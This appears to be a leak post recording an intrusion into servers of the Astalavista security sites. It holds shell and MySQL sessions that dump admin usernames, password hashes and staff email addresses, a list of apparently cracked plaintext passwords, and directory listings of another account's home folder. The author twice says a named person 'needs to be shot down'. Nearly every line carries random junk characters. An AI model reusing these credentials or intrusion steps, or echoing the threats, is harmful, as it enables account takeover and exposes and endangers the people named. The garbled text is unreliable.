<lastBuildDate>’ . date(’F, j M Y H:i:s O’) . ‘</lastBuildDate>5 l8 j7 k5 l3 p: M
<docs>http://blogs.law.harvard.edu/tech/rss</docs>: k4 w/ x3 F9 I5 {! [0 D! S6 ?
<generator>Astalavista.com</generator>
6 U4 L0 ~6 ?# y <webMaster>info@astalavista.com</webMaster>’ . $items . ‘% x2 P& O& Q" v: {# |, p- T1 B
</channel> ?2 @3 I0 A( w2 U
</rss>’; D0 G9 M5 a H$ J7 m1 L. }
& U( V1 Q8 Z) i1 S8 p4 q if (file_exists(FULLPATH . ‘/feed/exploits.xml’)) {
$ B3 _: j- m8 W. g# V- Y( F7 x unlink (FULLPATH . ‘/feed/exploits.xml’);( R% D u! s/ m, m9 W
}
7 ]7 {& v; a, ^1 n- X d. B# b. D: b* u! r0 Y: }7 @: V6 i
file_put_contents(FULLPATH . ‘/feed/exploits.xml’, $xml);
3 C) \/ n' z2 h! P+ k[snip]
. r2 l! V) r7 q2 T0 f% c, |) k3 F0 o/ o+ R7 |8 ~( P5 J3 R
sh-3.2$ cat exploits.sh
: ^' ?. D; b# X% n, N+ b, J; ?+ s#!/bin/sh
9 {7 d3 l8 @. ~. y% n, N
9 O! d9 [; `6 t! G( t3 B+ b1 Q###########################################################2 x$ ?) R7 M1 i W# J+ P, C
# #. W* m9 z. [ C* t
# Title: milw0rm exploits adder #5 _0 @* C/ B G0 |2 S( M8 a. T. }
# Description: Add all milw0rm exploits to the #2 @2 S6 D. W* w# I4 s0 L6 T0 n
# Astalavista.com database #
' l8 l$ }7 D0 ~( [2 ^2 n# #
$ K- m2 J: x( F1 E* e# Company: Astalavista Group #
# V+ Y4 @+ x6 W& x2 v* V4 k) ]# Author: Paulo M. Santos #
) d% d* v- u6 V7 R* } m5 F# E-Mail: 链接标记paulo.santos@astalavista.ch #
+ `5 R9 |; B( Q& _: B# #
6 g; W# y. }; o" N6 G###########################################################
5 }! E+ ^$ {7 L, N( l6 x) L
8 J. b. d+ \! b+ B" b/ F# path
6 M+ M" R( ^0 r6 ~this_path=/home/com/public_html/modifications/cronjobs
5 y( @& y! b" p: w0 L4 C/ U2 o' H: x
# change directory
. w& f6 Q% f& j8 V7 L9 @cd $this_path
" M4 y5 m, a+ ?. }0 b( wcd tmp/7 r* ^! p+ s0 Q# g
. y" p4 [' I. B' `$ |
# delete files
. \) ?2 `" t: y/ |, ~4 Hrm -rf milw0rm.tar.* &4 _+ X! P3 e+ J5 ` n7 ^7 Y, c
rm -rf milw0rm/ &
5 x" \. K+ y' ]" g- V. L+ R0 W3 M9 L3 n! e0 Z
# wget milw0rm paket
6 e$ q4 H1 w$ L: X; iwget 链接标记[url]http://www.milw0rm.com/sploits/milw0rm.tar.bz2[/url]
3 D( P4 a4 a4 ^+ U+ i8 E9 h! e7 ]: a0 T: i- ]
# extract milw0rm paket
7 J1 U- Y# c7 Etar -xvf milw0rm.tar.bz2
5 Q! g4 M: `* Z. `' N
: d0 ~: z% s. S# change owner
( }+ y) t9 |# _) Z, h- M7 Kchown -R com .
1 V9 T- t+ r$ p; A/ L- vchgrp -R com .
& a! O y- W4 J
8 Z- j/ `. u5 T: X! k# execute php script G* M7 @# T. s$ O' e* N
cd $this_path
9 C" {) x' r2 m1 N& Cphp -q exploits.php
7 x7 @( H7 M2 A. W5 o
0 T3 }2 D& J4 |; f7 P4 B# delete files
- C, t* l! |+ ?. P# K2 @8 xrm -rf tmp/milw0rm.tar.*/ L c% r. w( ?
rm -rf tmp/milw0rm/
4 V, v: |# \1 G) x9 [
8 Y- W8 w- H# d" J6 n% { u2 Nsh-3.2$ echo “Paulo M. Santos needs to be shot down.”
% k0 L- L1 q$ t* JPaulo M. Santos needs to be shot down.$ U% E+ ^8 `$ W9 U: c5 X0 _+ ^
" s) R h3 f# K! o. Pmysql -u contrexxuser2 -p( ~& r; S. n- Q+ ~; X! l- }
Enter password:9 }; V: K' m7 @! M
Welcome to the MySQL monitor. Commands end with ; or \g.
: G$ h' G% g6 G# M% B6 FYour MySQL connection id is 2616948 w, i; n, r( j4 R/ e& V
Server version: 5.0.45-community-log MySQL Community Edition (GPL)
* l3 M* G' S Z% B% x
! o5 z# p1 ^# c1 o9 PType ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.
; Z8 p3 x6 T: [% p# [- J# e
% h8 ]- \1 }) Zmysql> show databases;' k+ |/ V; K( K. m
+——————–+
) X" T/ n D* J. @; o| Database |0 d3 ]& V7 M$ s0 f0 |& c+ R+ z
+——————–+
& t8 P0 Y4 u5 ~% ]3 x- \- ^7 b| information_schema |; e! R" \' U3 \3 l
| com_contrexx2 |
/ t1 N6 q4 s1 m, ?, K| com_contrexx2_live |: M! N# Q5 p8 u' J) j8 N! [
| test |
% m0 L1 g8 R3 e! M/ l8 @/ V+——————–+
, A; P' f" ]- e5 O t5 d8 F4 rows in set (0.00 sec)9 \6 a! ]# u) Y) P+ M* b8 w+ U$ O
2 _- j& S2 |0 b3 w$ u% V2 o' v9 L% rmysql> use com_contrexx2_live8 b! L5 a" x; X0 g
Database changed
8 S: _& g: ^, t' v8 }mysql> show tables;! O. O& s& @1 X! b2 I4 W
+————————————————–+! I) c$ b `6 @
| Tables_in_com_contrexx2_live |
8 _; i+ F$ ^( X& J) R0 Q1 M+————————————————–+5 }1 s5 F8 ^2 ^; M# b
| cc_banner_counter |
4 o, R& u# m' q1 g, k| cc_search_counter |
' Y M& p! A# H V3 x/ A| contrexx_access_group_dynamic_ids |& z9 K: x3 P! S; N: d
| contrexx_access_group_static_ids |
' W1 K" p) E; A( {| contrexx_access_rel_user_group |
1 X7 o O* I+ F| contrexx_access_settings |# o3 G4 y1 I# h* j% Q* O
| contrexx_access_user_attribute |0 P2 [: z" R3 s1 E
| contrexx_access_user_attribute_name |
5 R* F' l5 k) t2 O$ e. {, ]$ D| contrexx_access_user_attribute_value |5 F* b0 I! j; T2 O, s, i8 T
| contrexx_access_user_core_attribute |8 B+ ^; [9 X& G/ z! q+ o
| contrexx_access_user_groups |* R1 x P3 f! v
| contrexx_access_user_mail |
+ G7 U9 D; w0 e* k8 @* ~| contrexx_access_user_profile |) q1 d/ n& Y% ]- w* ~, n
| contrexx_access_user_title |& R+ z" C) p( v* Y9 y4 x
| contrexx_access_user_validity |
3 D: T% }+ S3 }| contrexx_access_users |
5 M$ l7 J0 q( l0 {& r& I- r| contrexx_backend_areas |
4 e, A3 V6 f2 Z; b' Q/ M| contrexx_backups |- s4 r6 K t0 y9 y5 q- Q
| contrexx_content |- ^4 g7 z7 u8 O% {
| contrexx_content_history |7 f# P; m! ~4 E/ i" T, h. X
| contrexx_content_logfile |* [6 _+ Q3 H% F* A. K& b" Y
| contrexx_content_navigation |
7 s$ h4 E9 D' x$ V: P- ?4 ~| contrexx_content_navigation_history |
+ q0 `8 B' @* P' ^, @| contrexx_ids |
9 E: Y3 V, N- Q; y" q| contrexx_languages |
1 }( D; }1 V( i7 `% X, t X| contrexx_lib_country |4 t+ m* Z* L2 E. r
| contrexx_log |
/ J2 j8 f+ u4 T: ]& T| contrexx_module_alias_source |0 h+ O [$ R/ H/ k* l. {5 q4 G. F
| contrexx_module_alias_target |
' `. G B$ E" V. u| contrexx_module_block_blocks |
! u$ G: E' H7 J& H+ {; K| contrexx_module_block_rel_lang |) L! @. B& Z6 B3 ^$ D( ^
| contrexx_module_block_rel_pages |
1 R o/ A# {+ H7 G( i| contrexx_module_block_settings |& v- y. g; |2 p7 f x
| contrexx_module_blog_categories |
+ b: w* J% ]* o5 x0 T0 V+ F| contrexx_module_blog_comments |
B/ q6 v/ Q' n6 i| contrexx_module_blog_message_to_category |; G* b, e1 N5 k) R9 ]( ~
| contrexx_module_blog_messages |
9 n* y- [; E: s% `| contrexx_module_blog_messages_lang |
* ]- m! m3 |: D: `) t6 x| contrexx_module_blog_networks |
3 q/ X% m" F: Z$ _7 w4 z| contrexx_module_blog_networks_lang |$ r# r# t0 G: z% F& ]5 m
| contrexx_module_blog_settings |0 n/ Z9 O3 `" b! O
| contrexx_module_blog_votes |' x$ H% q f+ I1 y" q9 [) T7 `
| contrexx_module_calendar | x- v- m/ u! T) @2 ]
| contrexx_module_calendar_access |. @& a3 y* Y6 L, C5 J& }
| contrexx_module_calendar_categories |, W* p% A, Q0 Z; F9 {
| contrexx_module_calendar_form_data |# p8 n. N' s9 a# L9 @
| contrexx_module_calendar_form_fields |
( m# C$ s& F& {- N; q( @| contrexx_module_calendar_registrations |
% o0 w& @% m/ B! D$ q| contrexx_module_calendar_settings |
/ u8 `2 v& v- U$ Q| contrexx_module_calendar_style |: z! P- p0 }, q
| contrexx_module_contact_form |
9 f x( x. d: f9 Z7 `5 e| contrexx_module_contact_form_data |& M" z% y6 J" M. x s0 \ J
| contrexx_module_contact_form_field |
0 S: \, s4 c: R0 ?- k| contrexx_module_contact_settings |0 o# k0 g! E! z. K0 F4 X1 ?
| contrexx_module_data_categories |& _# ^. ~9 V2 L3 a+ V8 h- s# D
| contrexx_module_data_message_to_category |; m. \' S2 H4 s- X7 V
| contrexx_module_data_messages |4 ^. x0 Y) ^* B4 E3 V$ T7 y1 u
| contrexx_module_data_messages_lang |* \1 n* t$ j0 O, h# S8 Y' N
| contrexx_module_data_placeholders | ^& Y# e0 I! F- Z: f* f x+ g
| contrexx_module_data_settings |, ] M' d6 T3 U4 \ ~7 G
| contrexx_module_directory_access |: W: S% n9 |& T- U c8 `9 S
| contrexx_module_directory_categories |
9 E# c- k" N1 X& O0 @* A| contrexx_module_directory_dir |
2 v3 c: p) ]* T# {| contrexx_module_directory_inputfields |
5 V0 a2 M# X4 D9 J9 Z. k& O' v% v| contrexx_module_directory_levels |
7 P- ]5 S( b- v9 F4 P. H| contrexx_module_directory_mail |: j/ m" Z+ j/ C1 O: Z- Y; a
| contrexx_module_directory_rel_dir_cat |/ Y& W- v) r3 n1 p% \' N- [3 ]
| contrexx_module_directory_rel_dir_level |
. Y3 _* n) r( q n. ^4 y3 L| contrexx_module_directory_settings |
( ?1 R8 ]4 Y& @" F| contrexx_module_directory_settings_google |
) T& J5 Z$ l* H4 @7 C& j1 R| contrexx_module_directory_vote |
% r5 Y0 j* `! |+ n; e| contrexx_module_docsys |
. }& V0 x; E% m* r, s| contrexx_module_docsys_categories |
7 n! l, r; e: w" x| contrexx_module_egov_configuration |
7 B, [9 x/ l, a4 g| contrexx_module_egov_orders |
+ R# T5 N5 y2 ^4 W- H$ n' P! b: E| contrexx_module_egov_product_calendar |
* r2 Z' i9 n( d- ]. {2 T8 d| contrexx_module_egov_product_fields |
: X. z$ h( @4 x6 u8 T: t| contrexx_module_egov_products |
8 Y0 v8 B. m$ U& y: Q) K| contrexx_module_egov_settings |
( p) H' B# k9 a0 o. G| contrexx_module_exploits |
) C; h" p$ N6 P- G| contrexx_module_exploits_categories |# k- T0 }, i3 v- {. a2 \
| contrexx_module_feed_category |7 L: l% j4 B& z( m a4 Y
| contrexx_module_feed_news |
- }4 E0 H* e1 k% I( M& k( N| contrexx_module_feed_newsml_association |+ E0 x3 ^$ A0 d$ M& M: E9 `
| contrexx_module_feed_newsml_categories |
: c; ]8 ~" M/ K+ |# {" a| contrexx_module_feed_newsml_documents |
$ |2 ~ A# o% }: W. G$ [1 h! P| contrexx_module_feed_newsml_providers |
- w5 X, k+ \: B6 ~2 @| contrexx_module_forum_access |
: T- `# n. m, Z| contrexx_module_forum_categories |! q$ F, {. h: V# s5 _
| contrexx_module_forum_categories_lang |3 s# m2 ^9 `. X9 O/ }0 P2 z
| contrexx_module_forum_notification |" ]( U) o8 I- a# O
| contrexx_module_forum_postings |' H2 L, r# f4 A. S9 h, s
| contrexx_module_forum_rating |
9 g3 v _1 \( V; k3 g( J| contrexx_module_forum_settings |& N0 K/ V% J4 L" V; F
| contrexx_module_forum_statistics |
" f) \+ Z* o ?4 n3 B| contrexx_module_gallery_categories |
4 ^# @; U5 z6 z, J$ M| contrexx_module_gallery_comments |& E J- O3 V6 S5 U7 A1 ]6 S, @+ O
| contrexx_module_gallery_language |
4 O: ] R$ j* V* h$ W5 p| contrexx_module_gallery_language_pics |
( f& s9 w2 V( Q$ l5 e2 D E1 P- c| contrexx_module_gallery_pictures |6 A- G* U, e# F" b9 w% E
| contrexx_module_gallery_settings |) s4 X" N! q; M4 a3 `4 O [
| contrexx_module_gallery_votes |. i! V6 K0 m5 N0 O6 {8 {; l
| contrexx_module_guestbook |( l I3 m+ y$ A" _6 W+ E' P
| contrexx_module_guestbook_settings |" D7 z( c# A, ~5 q1 J) x8 b
| contrexx_module_livecam |: V5 P+ C) W$ Z2 w# w! n2 q
| contrexx_module_livecam_settings |
9 q& r6 h+ C$ a- Y! s: M| contrexx_module_market |
8 [6 g. D( B- x- t' i/ X| contrexx_module_market_access |+ O. ?* m9 z9 S7 F/ }
| contrexx_module_market_categories |
9 A8 J: O: U/ [) h1 @2 `2 r+ u: || contrexx_module_market_mail |
! J0 d7 c' t8 c' |" b6 r# N| contrexx_module_market_paypal |5 \) d; d5 `) E2 J( L! Q
| contrexx_module_market_settings |
- @2 ~* K# T Y0 {2 l| contrexx_module_market_spez_fields |
1 j9 L5 o! z8 I1 ^3 m- Q1 d| contrexx_module_mediadir_access |2 m. z$ _# b1 N
| contrexx_module_mediadir_categories | o. w. A1 }8 O& V
| contrexx_module_mediadir_comments |. N. f% @ P. g1 U2 X
| contrexx_module_mediadir_dir |0 P! R' k3 Z- G4 S& Q) {, Z. J) D
| contrexx_module_mediadir_inputfields |
7 V" w9 ~ V8 Z, h; q d| contrexx_module_mediadir_levels |
$ j! d' M. f$ g) r+ _| contrexx_module_mediadir_mail |
3 T5 H" `; X! Z4 O& l| contrexx_module_mediadir_rel_dir_cat |
7 ^, ]5 ^0 [0 E4 Q& F1 Z" l| contrexx_module_mediadir_rel_dir_level |
; r! m: k' _7 q3 V| contrexx_module_mediadir_reports |$ R" n. h v3 \
| contrexx_module_mediadir_settings |' V, [3 X* G P) S R7 ]& ]. @
| contrexx_module_mediadir_settings_google |
: b2 N) y! q2 j) w; ~7 _| contrexx_module_mediadir_vote |
E: l F3 a( X& `8 Q| contrexx_module_memberdir_directories |# t) _* D5 a, B1 {1 x7 t
| contrexx_module_memberdir_name |
" K; i$ \# a0 {4 }* P| contrexx_module_memberdir_settings |
4 E$ K+ e% k4 k3 b: L& ~9 d" v| contrexx_module_memberdir_values |2 p2 `# a9 ^, \' C# A
| contrexx_module_nettools_allowed_groups |% A: c: l7 q3 T+ y
| contrexx_module_nettools_settings |! I- Y8 _' ?5 e# n# C. ~* m
| contrexx_module_news |
: _ A: H# ~3 i; g) o ]| contrexx_module_news_access |" m# ~+ ]. D+ q* b: f
| contrexx_module_news_categories |
- ]) K( |4 N: f; || contrexx_module_news_settings |9 s3 i' n- f5 N
| contrexx_module_news_teaser_frame |& [/ D% v) F' k- h* P3 y, `
| contrexx_module_news_teaser_frame_templates |! |6 }/ s) a7 d
| contrexx_module_news_ticker |: l/ V% i) f/ k/ t7 g0 _
| contrexx_module_newsletter |
6 z+ P* k: @+ t& h, T| contrexx_module_newsletter_attachment |
; b) X* g" i( B| contrexx_module_newsletter_category |4 T H0 |& x) G: n/ r4 K9 u) l
| contrexx_module_newsletter_confirm_mail |
6 O$ K: M7 v/ T6 X| contrexx_module_newsletter_rel_cat_news |
9 P) M; y$ [. Q3 D| contrexx_module_newsletter_rel_user_cat |' @+ n M3 J: y( s
| contrexx_module_newsletter_settings |
" M2 f# v& a1 c/ z. T5 }: y- h% C| contrexx_module_newsletter_template |9 v( U: V$ B% y2 \4 F
| contrexx_module_newsletter_tmp_sending |9 o- K6 Y6 M1 o8 t2 I) v: {% i; k5 B
| contrexx_module_newsletter_user |
% Y( v9 `2 ?4 X9 o8 {" {! ^| contrexx_module_newsletter_user_title |
( Y, t1 v) x" h7 ?# g7 x| contrexx_module_onlinetools_defaultports |6 z. K; d! |* I+ M
| contrexx_module_onlinetools_defaultports_back |; u6 G9 F0 P2 N1 Y0 \+ E
| contrexx_module_onlinetools_geolitecity_blocks |5 T0 B. d# f7 l3 K8 X8 J
| contrexx_module_onlinetools_geolitecity_country |' O: \. @9 }8 g$ s
| contrexx_module_onlinetools_geolitecity_location |6 \0 {9 \2 ]7 b1 Z! o* I% b8 ]& {
| contrexx_module_podcast_category |2 D" _! v V* E0 ~- a
| contrexx_module_podcast_medium |
, R3 u& p: @( g% i5 S, }| contrexx_module_podcast_rel_category_lang |
3 V8 h' A% I0 a/ c% W, A4 Y: T| contrexx_module_podcast_rel_medium_category |
4 P0 Y1 H/ {3 B| contrexx_module_podcast_settings |- r2 B( r! U% X6 O/ c% |) M$ V& b0 ?
| contrexx_module_podcast_template |# D6 `9 D2 E T* u
| contrexx_module_proxydb |/ e7 J! s# z5 P1 i
| contrexx_module_recommend |) s7 H& b2 E; L9 V# O9 k A$ C
| contrexx_module_repository |
: g6 Z A$ p, E# g9 U| contrexx_module_securitynews_cats |1 R3 X( D, O0 p) N
| contrexx_module_securitynews_feeds |
1 B- O' \6 N5 _. i4 O- ~* P1 H| contrexx_module_securitynews_news |3 d% @1 @+ Q9 z" z; Z- K
| contrexx_module_shop_categories |. U; b8 W' e& Y9 Z1 a
| contrexx_module_shop_config |
& z) @' ~$ K" T# }% U' R' D7 V| contrexx_module_shop_countries |0 ?4 D g) W" g4 c* `
| contrexx_module_shop_currencies |* p; ]3 v& |2 B- z6 x' v
| contrexx_module_shop_customers |
5 M# @8 u" J7 A& L; W| contrexx_module_shop_importimg |8 n& d, v8 ^3 H: o# t1 {8 L( s
| contrexx_module_shop_lsv |
+ y3 U' z5 H4 C- @2 N| contrexx_module_shop_mail |
! r6 w1 q" T* A; || contrexx_module_shop_mail_content |
7 K9 B* p! [1 Y6 L; N5 {# d| contrexx_module_shop_manufacturer |
8 r# d" P( ~4 D3 P- h| contrexx_module_shop_order_items |2 M1 B4 D4 U- d; t U+ y
| contrexx_module_shop_order_items_attributes |
, E+ Q. O5 t, W( H( \| contrexx_module_shop_orders |: O' `; G/ ^3 {7 P
| contrexx_module_shop_payment |
$ h. A# Z1 R: W| contrexx_module_shop_payment_processors |0 Q7 w8 S2 A/ F4 R$ `8 ^9 A7 U
| contrexx_module_shop_pricelists |
5 E- o5 U" X9 s) E3 a. g: n| contrexx_module_shop_products |' w5 T% p7 w0 O
| contrexx_module_shop_products_attributes |
* W1 @/ P6 O+ p0 P W| contrexx_module_shop_products_attributes_name |
' S8 \7 i( k8 U4 \2 O- [* K p| contrexx_module_shop_products_attributes_value |
2 J, q7 @6 w' g& r# D| contrexx_module_shop_products_downloads |7 I9 g7 j& Y4 |0 X
| contrexx_module_shop_rel_countries |
2 M8 ]% P3 L, y! Y4 {# p8 v' A- u| contrexx_module_shop_rel_payment |1 ~# G6 A. Z4 f3 J& K3 q2 A
| contrexx_module_shop_rel_shipment |6 O1 L: k @ H- M
| contrexx_module_shop_shipment_cost |
& T( J( b+ L& o+ h| contrexx_module_shop_shipper |" e. \: E! Y# G" e* Z A5 ?
| contrexx_module_shop_vat |- Q# {* L% o9 ?) q# {/ B) @( N
| contrexx_module_shop_zones |8 d' l+ m2 m$ U- O& X0 I
| contrexx_module_u2u_address_list |
8 ?/ C' `# v4 _% [) X, \2 ^| contrexx_module_u2u_message_log |
. A& k6 l0 I. W| contrexx_module_u2u_sent_messages |" q+ b2 w2 i- F0 D
| contrexx_module_u2u_settings |
, X- ?( z5 U7 A/ H- G8 K, b1 U2 i| contrexx_module_u2u_user_log |
! C3 r" z: J% }. N0 S7 S, S| contrexx_modules |
" U9 s: o" o4 c+ f| contrexx_sessions |7 J0 J9 m3 ]: F$ ]1 X# }! E
| contrexx_settings |
! N5 D$ w z0 A- i| contrexx_settings_smtp |
4 h2 z4 j Z+ E4 x. a& n; O| contrexx_skins |% I5 _' Q5 F. R# W: p
| contrexx_stats_browser |; G! m* x+ o" z i8 E
| contrexx_stats_colourdepth |
4 T5 `# X1 i/ I4 R| contrexx_stats_config |
" V6 T0 R4 o/ M' ?; d- ?" L& A| contrexx_stats_country |0 `5 {" Y8 `1 f$ {2 V
| contrexx_stats_hostname |
) P* ?# i: j1 U) v# L+ S/ S| contrexx_stats_javascript |) i$ x! M: k8 i6 j
| contrexx_stats_operatingsystem |
9 z5 d$ H6 m& }( S. t0 ?| contrexx_stats_referer |
# Z8 X: F$ x' e1 g* \- Y| contrexx_stats_requests |( ^6 e2 X3 U3 d& O' e
| contrexx_stats_requests_summary |0 D: R, i7 q$ c+ M% j( o
| contrexx_stats_screenresolution |9 p0 I3 f1 u c& `& L
| contrexx_stats_search |; F1 L! i5 A- a4 {8 _ ^: e5 |
| contrexx_stats_spiders |
8 s4 g4 f& A. w" y9 k' {2 T| contrexx_stats_spiders_summary |
& h" h5 e% b% e; U, c) ?$ j| contrexx_stats_visitors |* i. k$ E7 {/ T" G/ g
| contrexx_stats_visitors_summary |
* S9 X0 U, U8 l t| contrexx_voting_additionaldata |
/ [. ^* ~: G! c' U# ?| contrexx_voting_email |4 ]0 A/ W9 t+ j ]0 \8 }) N
| contrexx_voting_rel_email_system |
/ T" c. _# d, q5 s| contrexx_voting_results |: n/ v: V. @0 s5 [" X
| contrexx_voting_system |& ~6 j$ W2 X9 \* I4 Z- C
| foo |
0 b" U* I, i U+————————————————–+' b" u+ k6 t" W; B9 {* o: ?
227 rows in set (0.01 sec)% @8 k( W: B, i$ Q" ?" N- c, B3 v
i2 Y4 k2 ?$ |+ K0 Q# M/ Smysql> select count(*) as skids from contrexx_access_users;
6 R* ]# ]7 S _' H0 C4 C* p, N4 e+——-+* V) q2 p" x! C2 ~6 Y
| skids |2 i$ E5 @4 D7 H& {/ O4 G+ V0 M
+——-+! z( f# ]8 x0 N: F0 l" f$ q
| 53699 |
' \% x3 q( H5 |% c8 U# i& g+——-+$ A0 p- `& O1 d3 T8 I
1 row in set (0.00 sec)8 G9 M6 v1 A; s7 F3 c6 H
8 D" x* l# O+ w! }( t* @% Bmysql> describe contrexx_access_users;
, q6 _$ t5 r/ v7 t+——————+——————————————+——+—–+————–+—————-+, C5 c% g/ Z% ^3 g8 ?
| Field | Type | Null | Key | Default | Extra |
1 O& C2 L3 }# w" w+——————+——————————————+——+—–+————–+—————-+
$ G( Z5 R* t9 F6 M1 f. s4 A4 c| id | int(10) unsigned | NO | PRI | NULL | auto_increment |
3 Q2 @' Y- Q' a7 v7 e5 s| is_admin | tinyint(1) unsigned | NO | | 0 | | R( R# A# K7 ]6 k& J# s; Q, y
| username | varchar(40) | YES | MUL | NULL | |6 N! G8 W4 G; f9 D$ @+ _- v
| password | varchar(32) | YES | | NULL | |
5 Q4 ]" T( P1 @; A( C" E| regdate | int(14) unsigned | NO | | 0 | |
/ r; i- Q c% M: b/ T| expiration | int(14) unsigned | NO | | 0 | |( m$ p3 ?$ w' B. s- R5 {
| validity | int(10) unsigned | NO | | 0 | |
4 h% N3 U) }. H0 f5 x| last_auth | int(14) unsigned | NO | | 0 | |
1 W6 x6 j2 P) V& E| last_activity | int(14) unsigned | NO | | 0 | |
& l& g4 t. n# a9 d+ P1 ?, w| email | varchar(255) | YES | | NULL | |5 j- m) l- k: m. J, o/ m
| email_access | enum(’everyone’,'members_only’,'nobody’) | NO | | nobody | |3 H' r+ z2 y8 `4 ^* J- g( `
| frontend_lang_id | int(2) unsigned | NO | | 0 | |% V; O# o2 W) S8 q4 i
| backend_lang_id | int(2) unsigned | NO | | 0 | |
- O( [8 I, z1 w7 b" i$ a| active | tinyint(1) | NO | | 0 | |1 H3 a w. k! H
| profile_access | enum(’everyone’,'members_only’,'nobody’) | NO | | members_only | |
4 C9 k1 h# @9 t3 ^' m' R| restore_key | varchar(32) | NO | | | |8 W5 `" q2 \$ b- s
| restore_key_time | int(14) unsigned | NO | | 0 | |
( i9 M) U C5 [7 O# e' k2 V| u2u_active | enum(’0′,’1′) | NO | | 1 | |
+ J" U) L5 S x2 `; H+——————+——————————————+——+—–+————–+—————-+
! @ M- O) q* i" K5 r1 I: P, {/ n18 rows in set (0.00 sec)1 V O) l$ c# E
6 {2 y) p- K( Z& A. G
mysql> select username,password,email from contrexx_access_users where is_admin = 1;
/ l, q* | J) D+————+———————————-+—————————–+. g+ c- N$ V/ O9 O3 a8 U$ U; C
| username | password | email |. P. ]! [. b4 h) [' l d2 ]0 R
+————+———————————-+—————————–+
, l# f7 G- f% F" n/ O& Y; I, B" m| system | 0defe9e458e745625fffbc215d7801c5 | 链接标记info@comvation.com |& ]8 V8 j) C7 r+ H
| prozac | 1f65f06d9758599e9ad27cf9707f92b5 | 链接标记prozac@astalavista.com |
$ ^, P5 [! Q4 o) W4 ~0 y| Be1er0ph0r | 78d164dc7f57cc142f07b1b4629b958a | 链接标记paulo.santos@astalavista.ch |8 F1 H, x$ b. ~0 _$ s5 g9 }; F
| schmid | 0defe9e458e745625fffbc215d7801c5 | 链接标记ivan.schmid@comvation.com |
3 {" d* W0 C; r( u D2 `1 h. n+————+———————————-+—————————–+& r* i8 x. G }7 S
4 rows in set (0.04 sec)6 ]: `* @0 u/ C5 ~5 ?' I
i: B2 i9 z, Y& |- _mysql> exit;& [7 N/ B7 Y! h: t1 \% s
Bye- Q0 Z1 a# t2 l. A$ g3 y$ q
0 ^0 g# F, G0 f6 s$ T, p
[~] There you go, your “team of security and IT professionals” is a joke.
' c3 j3 @" {, g m$ J( \# m( C1 `
+——————————+
% V4 v+ |: t# @, Lsystem:f82BN3+_*
8 ~7 k/ z6 b' B; e9 dBe1er0ph0r:belerophor4astacom& O3 O! W+ ^9 j
prozac:asta4cms!
8 e0 o$ F% S. s6 ecommander:mpbdaagf6m/ V/ S ~6 Q i! g
sykadul:ak29eral+ b2 \2 ~* x% n g! b
+——————————+) T; w. C! k( m+ N
! y" R+ ~- ]( C: |. ]
[~] Paulo M. Santos AKA Be1er0ph0r needs to be shot down for his milw0rm ripping script(s)% s( l. T/ i' Z3 q
…and the others, find another area to get paid from, security isn’t for sale and you obviously fail at it.
7 j ~6 p1 `2 \3 B& n q2 t6 ]. c. E) q# ~1 L9 _* e
[~] Lets move to astalavista.net now,: y7 z1 A5 f1 m. J T5 M
) h1 L G( Y" O1 @( K
From <链接标记[url]https://www.astalavista.net/[/url]>:
8 w' K9 R& ]5 |! e6 t6 ]5 W s>> Everyone knows that the best defense is a good offense.& W+ W0 g3 s4 Y2 T! u& z
>> Those who wait for their foes to find a security loophole are opting for the wrong strategy.) y% V9 W" O: |$ V1 q8 }
>> The ASTALAVISTA hacking & security community is the largest IT security community in the world.
/ k1 o( @/ Y6 N) A; U>> It.s a platform for both IT specialists and novices, and anyone interested in expanding and updating their knowledge regarding IT security and hacking.”; \9 F) L/ o) P; e# u# `
! h8 z9 [. [- h, P D: c
>> Go ahead, try and hack our server . in a completely legal way!
0 h; q7 C# f: B4 I+ K>> Learn by doing: We offer our members tricky tasks and challenges on an
* j! O: Q s+ c1 E* H9 H- ]>> ongoing basis so you can test your knowledge and abilities. You can also
. H8 e. J1 S0 F3 T>> demonstrate what you.ve mastered by taking part in regular hacker contests3 Z; X' G/ b1 ~8 ~$ H2 z. ^
>> and war games
8 d! _/ ]- }; |- p5 j) W9 K% z0 P! [: j' B# t8 ?" I2 b4 l/ Z+ Z8 I
[~] Lets take a look there, after all… they are hack-proof, aren’t they?!4 b! U; h+ v) X$ |) z
, S* A1 W7 G- U[-] Tricky task: Find home dir of astalavista.net
* ^6 v! S1 S4 [- v5 V+ s
) [( e* S9 a* _sh-3.2$ ls -la ~astanet8 B4 u( z5 y8 e5 ]3 e& B
total 489 z. L$ A0 m1 D5 `
drwx–x–x 6 astanet astanet 4096 Dec 23 15:55 ./ }- K. T d1 h( r6 g4 C' k
drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..) G$ w& C3 F0 p% l& ?
drwxr-xr-x 2 root root 4096 Dec 23 16:00 auth
. k5 i3 k% l; _7 l# \/ W2 W. V-rw——- 1 astanet astanet 3892 Apr 16 12:14 .bash_history
) t, C y4 ]9 R5 C-rw-r–r– 1 astanet astanet 33 Dec 17 21:50 .bash_logout' G/ N0 m( K( L
-rw-r–r– 1 astanet astanet 176 Dec 17 21:50 .bash_profile
6 u7 |7 ^# @" A, c% v9 R9 X-rw-r–r– 1 astanet astanet 124 Dec 17 21:50 .bashrc- H" S8 G0 v! Q* G) i
drwx–x–x 3 astanet astanet 4096 Dec 23 12:18 domains
; E( e6 z- W, P. _drwxrwx— 3 astanet mail 4096 Dec 23 12:18 imap: R" q* A, K6 a- Y! t* j
drwx—— 2 astanet astanet 4096 Dec 23 12:18 mail. |/ [3 Q/ N' d) J: s0 Q; M
lrwxrwxrwx 1 astanet astanet 37 Dec 23 12:18 public_html -> ./domains/astalavista.net/public_html
; E/ j8 V2 g+ J# \2 ?; j) S-rw-r—– 1 astanet mail 34 Dec 22 12:41 .shadow
( Z# l4 i |6 [5 i# @! T% r
+ {3 M9 v% U6 Msh-3.2$ cd /home/astanet/domains/astalavista.net/private_html/" Q8 r P$ C: m
sh-3.2$ ls -la" h& X; L& k% D) A
total 200
# w4 k- H/ }: |3 y( udrwxr-x— 29 astanet apache 4096 Jan 6 13:58 .
1 m* x( g Q$ F1 E7 K& D- A! xdrwx–x–x 8 astanet astanet 4096 Dec 23 13:53 ..1 c* w1 g. w. t: d1 w
drwxr-xr-x 3 astanet astanet 4096 Dec 27 2006 _007
1 v% A$ N, O: x3 ^5 L0 I; Rdrwxr-xr-x 7 astanet astanet 4096 Jan 5 2006 _0mysql
, G) T2 [) A, c8 r- bdrwxr-xr-x 7 astanet astanet 4096 Dec 22 14:16 链接标记astanet@astalavista.com: z0 }' t% ~6 Q# D6 v! {$ i
drwxrwxrwx 2 astanet astanet 4096 Jan 5 2006 backend
